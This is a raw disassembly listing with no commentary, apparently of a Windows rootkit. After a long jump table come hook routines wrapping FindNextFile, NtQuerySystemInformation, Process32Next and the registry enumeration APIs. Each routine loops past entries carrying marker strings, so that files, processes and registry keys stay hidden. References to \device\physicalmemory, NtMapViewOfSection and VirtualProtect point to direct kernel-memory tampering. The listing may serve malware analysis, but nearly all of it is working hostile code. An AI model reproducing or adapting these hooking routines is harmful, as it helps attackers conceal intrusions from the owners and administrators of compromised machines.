dd offset loc_401E01
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_401E36
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_401E36
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_401E36
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_401E36
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E36
dd offset loc_401E36
dd offset loc_401EB9
dd offset loc_401EE4
dd offset loc_401F5C
dd offset loc_401F22
dd offset loc_401E25
dd offset loc_401F10
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401F10
dd offset loc_401F22
dd offset loc_401F10
dd offset loc_401F10
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
off_43B504 dd offset loc_401DB1 ; DATA XREF: sub_401D14+2B3�r
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401F39
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401E25
dd offset loc_401F5C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F10
dd offset loc_401F10
dd offset loc_401F72
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401F10
dd offset loc_401F22
dd offset loc_401F7E
dd offset loc_40200C
dd offset loc_401F72
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DD1
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F39
dd offset loc_401E25
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401E6D
dd offset loc_401F8A
dd offset loc_401E8E
dd offset loc_401E8E
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DEC
dd offset loc_401DEC
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
off_43B6D4 dd offset loc_401FD3 ; DATA XREF: sub_401D14+29E�r
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_402005
dd offset loc_40200C
dd offset loc_402005
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FE9
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401FD3
dd offset loc_401FF6
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_402005
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401FD3
dd offset loc_401FF6
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_402005
dd offset loc_401FF6
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_401FD3
dd offset loc_402005
dd offset loc_402005
dd offset loc_402005
dd offset loc_402005
dd offset loc_402005
dd offset loc_402005
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
aFindnextfilea db 'FindNextFileA',0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43B863: ; CODE XREF: .data:0043B8AC�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BA70h
test eax, eax
jz short loc_43B8AE
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43B87D: ; CODE XREF: .data:0043B883�j
cmp byte ptr [ebx], 0
jz short loc_43B885
inc ebx
jmp short loc_43B87D
; ---------------------------------------------------------------------------
loc_43B885: ; CODE XREF: .data:0043B880�j
mov word ptr [ebx], 463Ah
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC4A6h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43B8AB
popa
jmp short loc_43B8AE
; ---------------------------------------------------------------------------
loc_43B8AB: ; CODE XREF: .data:0043B8A6�j
popa
jmp short loc_43B863
; ---------------------------------------------------------------------------
loc_43B8AE: ; CODE XREF: .data:0043B870�j
; .data:0043B8A9�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h
db 65h, 57h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43B8E4: ; CODE XREF: .data:0043B933�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BAF1h
test eax, eax
jz short loc_43B935
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43B8FE: ; CODE XREF: .data:0043B906�j
cmp word ptr [ebx], 0
jz short loc_43B908
inc ebx
inc ebx
jmp short loc_43B8FE
; ---------------------------------------------------------------------------
loc_43B908: ; CODE XREF: .data:0043B902�j
mov dword ptr [ebx], 46003Ah
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C62Dh
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43B932
popa
jmp short loc_43B935
; ---------------------------------------------------------------------------
loc_43B932: ; CODE XREF: .data:0043B92D�j
popa
jmp short loc_43B8E4
; ---------------------------------------------------------------------------
loc_43B935: ; CODE XREF: .data:0043B8F1�j
; .data:0043B930�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
dw 0FFFFh
dword_43B948 dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh
; DATA XREF: .data:0043BE94�o
dd 616D726Fh, 6E6F6974h
db 0
; ---------------------------------------------------------------------------
loc_43B965: ; DATA XREF: .data:0043BE9C�o
push ebp
mov ebp, esp
sub esp, 24h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
sub esp, 10h
mov eax, [ebp+14h]
mov edi, [ebp+10h]
mov ebx, [ebp+0Ch]
mov [esp+0Ch], eax
mov [esp+8], edi
mov [esp+4], ebx
mov esi, [ebp+8]
mov [esp], esi
call near ptr 245BB9Bh
mov [ebp-4], eax
cmp esi, 5
jz short loc_43B9B5
loc_43B9A1: ; CODE XREF: .data:0043B9BB�j
; .data:0043BA0E�j
mov eax, [ebp-4]
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_43B9B5: ; CODE XREF: .data:0043B99F�j
cmp edi, 1F40h
jle short loc_43B9A1
jmp short loc_43B9C3
; ---------------------------------------------------------------------------
loc_43B9BF: ; CODE XREF: .data:0043BA10�j
mov esi, ebx
loc_43B9C1: ; CODE XREF: .data:0043BA08�j
add ebx, eax
loc_43B9C3: ; CODE XREF: .data:0043B9BD�j
pusha
mov eax, [ebx+44h]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43B9D1: ; CODE XREF: .data:0043B9E4�j
bt eax, ebx
jb short loc_43B9DC
mov byte ptr [esp+ebx], 30h
jmp short loc_43B9E0
; ---------------------------------------------------------------------------
loc_43B9DC: ; CODE XREF: .data:0043B9D4�j
mov byte ptr [esp+ebx], 31h
loc_43B9E0: ; CODE XREF: .data:0043B9DA�j
inc ebx
cmp ebx, 20h
jnz short loc_43B9D1
push esp
call near ptr 0C4FC5F8h
add esp, 24h
test ax, ax
jnz short loc_43B9F7
popa
jmp short loc_43BA0A
; ---------------------------------------------------------------------------
loc_43B9F7: ; CODE XREF: .data:0043B9F2�j
popa
mov eax, [ebx]
test eax, eax
jnz short loc_43BA06
mov dword ptr [esi], 0
jmp short loc_43BA0A
; ---------------------------------------------------------------------------
loc_43BA06: ; CODE XREF: .data:0043B9FC�j
add [esi], eax
jmp short loc_43B9C1
; ---------------------------------------------------------------------------
loc_43BA0A: ; CODE XREF: .data:0043B9F5�j
; .data:0043BA04�j
mov eax, [ebx]
test eax, eax
jz short loc_43B9A1
jmp short loc_43B9BF
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0FFFFFFh
aProcess32next db 'Process32Next',0 ; DATA XREF: .data:off_43BE84�o
word_43BA26 dw 8360h ; DATA XREF: .data:off_43BE8C�o
dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh
dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h
dd 1013D07h, 5750101h, 20202E9h
db 2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43BA6E: ; CODE XREF: .data:0043BABC�j
sub esp, 8
mov ebx, [ebp+0Ch]
mov edi, [ebp+8]
mov [esp+4], ebx
mov [esp], edi
call near ptr 245BC85h
test eax, eax
jz short loc_43BABE
pusha
mov eax, [ebx+8]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43BA95: ; CODE XREF: .data:0043BAA8�j
bt eax, ebx
jb short loc_43BAA0
mov byte ptr [esp+ebx], 30h
jmp short loc_43BAA4
; ---------------------------------------------------------------------------
loc_43BAA0: ; CODE XREF: .data:0043BA98�j
mov byte ptr [esp+ebx], 31h
loc_43BAA4: ; CODE XREF: .data:0043BA9E�j
inc ebx
cmp ebx, 20h
jnz short loc_43BA95
push esp
call near ptr 0C4FC6BCh
add esp, 24h
test ax, ax
jnz short loc_43BABB
popa
jmp short loc_43BABE
; ---------------------------------------------------------------------------
loc_43BABB: ; CODE XREF: .data:0043BAB6�j
popa
jmp short loc_43BA6E
; ---------------------------------------------------------------------------
loc_43BABE: ; CODE XREF: .data:0043BA85�j
; .data:0043BAB9�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BAE4: ; CODE XREF: .data:0043BB31�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BCF7h
test eax, eax
jnz short loc_43BB33
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BAFF: ; CODE XREF: .data:0043BB05�j
cmp byte ptr [ebx], 0
jz short loc_43BB07
inc ebx
jmp short loc_43BAFF
; ---------------------------------------------------------------------------
loc_43BB07: ; CODE XREF: .data:0043BB02�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC728h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BB2D
popa
jmp short loc_43BB33
; ---------------------------------------------------------------------------
loc_43BB2D: ; CODE XREF: .data:0043BB28�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43BAE4
; ---------------------------------------------------------------------------
loc_43BB33: ; CODE XREF: .data:0043BAF7�j
; .data:0043BB2B�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BB4C: ; CODE XREF: .data:0043BB9F�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BD5Fh
test eax, eax
jnz short loc_43BBA1
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BB67: ; CODE XREF: .data:0043BB6F�j
cmp word ptr [ebx], 0
jz short loc_43BB71
inc ebx
inc ebx
jmp short loc_43BB67
; ---------------------------------------------------------------------------
loc_43BB71: ; CODE XREF: .data:0043BB6B�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C896h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BB9B
popa
jmp short loc_43BBA1
; ---------------------------------------------------------------------------
loc_43BB9B: ; CODE XREF: .data:0043BB96�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43BB4C
; ---------------------------------------------------------------------------
loc_43BBA1: ; CODE XREF: .data:0043BB5F�j
; .data:0043BB99�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dword_43BBA8 dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h ; DATA XREF: .data:0043BEE4�o
db 0
; ---------------------------------------------------------------------------
loc_43BBB9: ; DATA XREF: .data:0043BEEC�o
push ebp
mov ebp, esp
loc_43BBBC: ; CODE XREF: .data:0043BC37�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BBCA
push dword ptr [eax]
loc_43BBCA: ; CODE XREF: .data:0043BBC6�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BDE9h
test eax, eax
jnz short loc_43BC39
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BBF1: ; CODE XREF: .data:0043BBF9�j
cmp word ptr [ebx], 0
jz short loc_43BBFB
inc ebx
inc ebx
jmp short loc_43BBF1
; ---------------------------------------------------------------------------
loc_43BBFB: ; CODE XREF: .data:0043BBF5�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C920h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BC25
popa
jmp short loc_43BC39
; ---------------------------------------------------------------------------
loc_43BC25: ; CODE XREF: .data:0043BC20�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BC32
pop dword ptr [eax]
loc_43BC32: ; CODE XREF: .data:0043BC2E�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BBBC
; ---------------------------------------------------------------------------
loc_43BC39: ; CODE XREF: .data:0043BBE9�j
; .data:0043BC23�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43BC45
add esp, 4
loc_43BC45: ; CODE XREF: .data:0043BC40�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BC60: ; CODE XREF: .data:0043BCD5�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BC6E
push dword ptr [eax]
loc_43BC6E: ; CODE XREF: .data:0043BC6A�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BE8Dh
test eax, eax
jnz short loc_43BCD7
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BC95: ; CODE XREF: .data:0043BC9B�j
cmp byte ptr [ebx], 0
jz short loc_43BC9D
inc ebx
jmp short loc_43BC95
; ---------------------------------------------------------------------------
loc_43BC9D: ; CODE XREF: .data:0043BC98�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC8BEh
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BCC3
popa
jmp short loc_43BCD7
; ---------------------------------------------------------------------------
loc_43BCC3: ; CODE XREF: .data:0043BCBE�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BCD0
pop dword ptr [eax]
loc_43BCD0: ; CODE XREF: .data:0043BCCC�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BC60
; ---------------------------------------------------------------------------
loc_43BCD7: ; CODE XREF: .data:0043BC8D�j
; .data:0043BCC1�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43BCE3
add esp, 4
loc_43BCE3: ; CODE XREF: .data:0043BCDE�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dword_43BCE8 dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h ; DATA XREF: .data:0043BF04�o
db 65h, 57h, 0
; ---------------------------------------------------------------------------
loc_43BCFB: ; DATA XREF: .data:0043BF0C�o
push ebp
mov ebp, esp
loc_43BCFE: ; CODE XREF: .data:0043BD79�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BD0C
push dword ptr [eax]
loc_43BD0C: ; CODE XREF: .data:0043BD08�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BF2Bh
test eax, eax
jnz short loc_43BD7B
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BD33: ; CODE XREF: .data:0043BD3B�j
cmp word ptr [ebx], 0
jz short loc_43BD3D
inc ebx
inc ebx
jmp short loc_43BD33
; ---------------------------------------------------------------------------
loc_43BD3D: ; CODE XREF: .data:0043BD37�j
mov dword ptr [ebx], 560023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50CA62h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BD67
popa
jmp short loc_43BD7B
; ---------------------------------------------------------------------------
loc_43BD67: ; CODE XREF: .data:0043BD62�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BD74
pop dword ptr [eax]
loc_43BD74: ; CODE XREF: .data:0043BD70�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BCFE
; ---------------------------------------------------------------------------
loc_43BD7B: ; CODE XREF: .data:0043BD2B�j
; .data:0043BD65�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43BD87
add esp, 4
loc_43BD87: ; CODE XREF: .data:0043BD82�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h
db 65h, 41h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BDA2: ; CODE XREF: .data:0043BE17�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BDB0
push dword ptr [eax]
loc_43BDB0: ; CODE XREF: .data:0043BDAC�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BFCFh
test eax, eax
jnz short loc_43BE19
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BDD7: ; CODE XREF: .data:0043BDDD�j
cmp byte ptr [ebx], 0
jz short loc_43BDDF
inc ebx
jmp short loc_43BDD7
; ---------------------------------------------------------------------------
loc_43BDDF: ; CODE XREF: .data:0043BDDA�j
mov word ptr [ebx], 5623h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FCA00h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BE05
popa
jmp short loc_43BE19
; ---------------------------------------------------------------------------
loc_43BE05: ; CODE XREF: .data:0043BE00�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BE12
pop dword ptr [eax]
loc_43BE12: ; CODE XREF: .data:0043BE0E�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BDA2
; ---------------------------------------------------------------------------
loc_43BE19: ; CODE XREF: .data:0043BDCF�j
; .data:0043BE03�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43BE25
add esp, 4
loc_43BE25: ; CODE XREF: .data:0043BE20�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
db 2 dup(0FFh), 0
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_402A4D+45D�o
; .data:off_43BE88�o
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_40223C+E�o
; .data:0043BE98�o ...
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .data:0043BEE8�o
; .data:0043BF08�o
aIphlpapi_dll db 'iphlpapi.dll',0
aInetmib1_dll db 'inetmib1.dll',0
aWsock32_dll db 'wsock32.dll',0
aUser32_dll db 'user32.dll',0
off_43BE84 dd offset aProcess32next ; DATA XREF: sub_402A4D+CF�r
; sub_402A4D+102�r ...
; "Process32Next"
off_43BE88 dd offset aKernel32_dll ; DATA XREF: sub_402A4D+B0�r
; "kernel32.dll"
off_43BE8C dd offset word_43BA26 ; DATA XREF: sub_4028A6+193�r
byte_43BE90 db 0 ; DATA XREF: sub_402A4D+76�r
; sub_402A4D+93�r
align 4
dd offset dword_43B948+4
dd offset aNtdll_dll ; "ntdll.dll"
dd offset loc_43B965
dd 1, 43B8C5h, 43BE2Fh, 43B8D3h, 1, 43B844h, 43BE2Fh, 43B852h
dd 2, 43BB3Dh, 43BE46h, 43BB49h, 1, 43BAD5h, 43BE46h, 43BAE1h
dd 0
dd offset dword_43BBA8+3
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43BBB9
dd 1, 43BC4Fh, 43BE46h, 43BC5Dh, 0
dd offset dword_43BCE8+5
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43BCFB
dd 1, 43BD91h, 43BE46h, 43BD9Fh, 5 dup(0)
dd 4
dword_43BF38 dd 0Ah ; DATA XREF: sub_4022CC+152�r
dword_43BF3C dd 0 ; DATA XREF: .text:004021B4�r
; .text:loc_4021CD�r ...
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_40223C+25�o
dd offset dword_417644+607h
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_40223C+3A�o
aNVH2 db 'N-v%H|2',0
aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_40223C+4F�o
aZE db 'z>e',0
aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_40223C+6B�o
aFpidy db 'FpIdY ',0
aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_40223C+7B�o
aE1qf db 'e`1qF',0
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_4022CC+C8�o
aDevicePhysical: ; DATA XREF: sub_4022CC+2D�o
unicode 0, <\device\physicalmemory>,0
aA_utc2 db '_utc*2',0 ; DATA XREF: sub_40223C+1D�o
aHgtr db 'hgtr',0 ; DATA XREF: sub_4022CC+20�o
aQOkgoj db 'Q!okgOJ',0 ; DATA XREF: sub_4022CC+3F�o
dword_43C00F dd 802036h ; DATA XREF: sub_4022CC+64�r
aXghyb_v db 'Xhyb.',0 ; DATA XREF: sub_4022CC+A5�o
align 4
dw 8
unicode 0, <>,0
dword_43C020 dd 0Bh ; DATA XREF: sub_402A4D+1BD�r
; sub_402A4D+5FA�r
dword_43C024 dd 0 ; DATA XREF: .text:004024F0�r
; .text:loc_402509�r ...
aWcscmp db 'wcscmp',0 ; DATA XREF: .data:off_43C0B8�o
aHtons db 'htons',0
align 2
aVirtualprotect db 'VirtualProtect',0
align 2
aGetcurrentproc db 'GetCurrentProcessId',0
aFindwindowa db 'FindWindowA',0
aSendmessagea db 'SendMessageA',0
a3 db '3&<',0
aIsbadreadptr db 'IsBadReadPtr',0
aNgwn db ' nGwn',0
aGlobalfindatom db 'GlobalFindAtomA',0
aGlobalfindat_0 db 'GlobalFindAtomW',0
aRW db '*r',27h,'w<#',0
align 4
byte_43C0B4 db 3 ; DATA XREF: sub_402572+B0�r
align 4
off_43C0B8 dd offset aWcscmp ; DATA XREF: sub_402572+137�r
; sub_402572+19F�r
; "wcscmp"
off_43C0BC dd offset aNtdll_dll ; DATA XREF: sub_402572+124�r
; "ntdll.dll"
dd 5, 43C02Fh, 43BE6Dh, 7, 43C036h, 43BE2Fh, 8, 43C046h
dd 43BE2Fh, 9, 43C05Ah, 43BE79h, 0Ah, 43C066h, 43BE79h
dd 0Bh, 43C077h, 43BE2Fh, 0Ch, 43C08Ah, 43BE2Fh, 0Dh, 43C09Ah
dd 43BE2Fh
aA9s db 'A^9S',0 ; DATA XREF: sub_402572+26C�o
dword_43C125 dd 27603Dh ; DATA XREF: sub_4028A6:loc_402945�r
word_43C129 dw 81h ; DATA XREF: sub_402A4D+110�r
